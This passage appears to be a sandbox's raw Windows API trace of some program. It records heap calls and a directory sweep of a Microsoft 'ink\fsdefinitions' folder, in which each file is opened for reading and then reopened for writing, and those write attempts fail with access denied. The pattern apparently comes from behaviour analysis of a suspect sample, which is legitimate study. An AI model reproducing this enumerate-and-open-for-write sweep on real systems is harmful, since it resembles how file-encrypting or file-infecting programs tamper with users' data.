(HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0083.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0083.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0083.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81d68 [0083.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.305] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.305] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.305] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.305] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81d68 | out: hHeap=0x20000) returned 1 [0083.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.305] AreFileApisANSI () returned 1 [0083.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", lpUsedDefaultChar=0x0) returned 84 [0083.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0083.305] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.306] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0083.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0083.306] AreFileApisANSI () returned 1 [0083.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0083.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x60348 [0083.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x60348, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 84 [0083.306] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.307] GetFileType (hFile=0x340) returned 0x1 [0083.307] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0083.307] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.307] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.307] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.307] CloseHandle (hObject=0x340) returned 1 [0083.307] AreFileApisANSI () returned 1 [0083.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0083.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x5f798 [0083.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5f798, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 84 [0083.308] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.308] GetLastError () returned 0x5 [0083.308] GetLastError () returned 0x5 [0083.308] SetLastError (dwErrCode=0x5) [0083.308] GetLastError () returned 0x5 [0083.308] SetLastError (dwErrCode=0x5) [0083.308] GetLastError () returned 0x5 [0083.308] SetLastError (dwErrCode=0x5) [0083.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0083.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0083.308] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.308] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.308] FindNextFileW (in: hFindFile=0x78590, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0xa6, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x80fc8, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0xa6, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓ƈ")) returned 0 [0083.308] FindClose (in: hFindFile=0x78590 | out: hFindFile=0x78590) returned 1 [0083.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0083.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0083.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0083.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0083.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0083.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0083.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0083.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0083.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0083.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0083.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.309] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.309] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.309] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.309] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.309] AreFileApisANSI () returned 1 [0083.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml", lpUsedDefaultChar=0x0) returned 76 [0083.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0083.309] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.309] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0083.310] AreFileApisANSI () returned 1 [0083.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0083.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85b20 [0083.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x85b20, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 76 [0083.310] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.310] GetFileType (hFile=0x42c) returned 0x1 [0083.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85b20 | out: hHeap=0x20000) returned 1 [0083.310] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.310] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.310] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.310] CloseHandle (hObject=0x42c) returned 1 [0083.311] AreFileApisANSI () returned 1 [0083.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0083.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x858a0 [0083.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x858a0, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 76 [0083.311] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.311] GetLastError () returned 0x5 [0083.311] GetLastError () returned 0x5 [0083.311] SetLastError (dwErrCode=0x5) [0083.311] GetLastError () returned 0x5 [0083.311] SetLastError (dwErrCode=0x5) [0083.311] GetLastError () returned 0x5 [0083.311] SetLastError (dwErrCode=0x5) [0083.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x858a0 | out: hHeap=0x20000) returned 1 [0083.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0083.311] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.311] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.311] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cd023, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="main", cAlternateFileName="")) returned 1 [0083.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0083.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0083.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0083.312] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.312] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.312] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.312] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0083.312] AreFileApisANSI () returned 1 [0083.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main", lpUsedDefaultChar=0x0) returned 70 [0083.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0083.312] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.312] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0083.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.312] AreFileApisANSI () returned 1 [0083.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0083.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8ad80 [0083.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main") returned 70 [0083.312] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.312] GetLastError () returned 0x5 [0083.312] GetLastError () returned 0x5 [0083.312] SetLastError (dwErrCode=0x5) [0083.312] GetLastError () returned 0x5 [0083.312] SetLastError (dwErrCode=0x5) [0083.312] GetLastError () returned 0x5 [0083.313] SetLastError (dwErrCode=0x5) [0083.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0083.313] AreFileApisANSI () returned 1 [0083.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0083.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8b110 [0083.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8b110, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main") returned 70 [0083.313] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.313] GetLastError () returned 0x5 [0083.313] GetLastError () returned 0x5 [0083.313] SetLastError (dwErrCode=0x5) [0083.313] GetLastError () returned 0x5 [0083.313] SetLastError (dwErrCode=0x5) [0083.313] GetLastError () returned 0x5 [0083.313] SetLastError (dwErrCode=0x5) [0083.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0083.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0083.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0083.313] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.313] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.313] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.313] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0083.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8afe0 [0083.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0083.313] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xadda, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="main.xml", cAlternateFileName="")) returned 1 [0083.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0083.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0083.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0083.314] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78510 [0083.315] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, 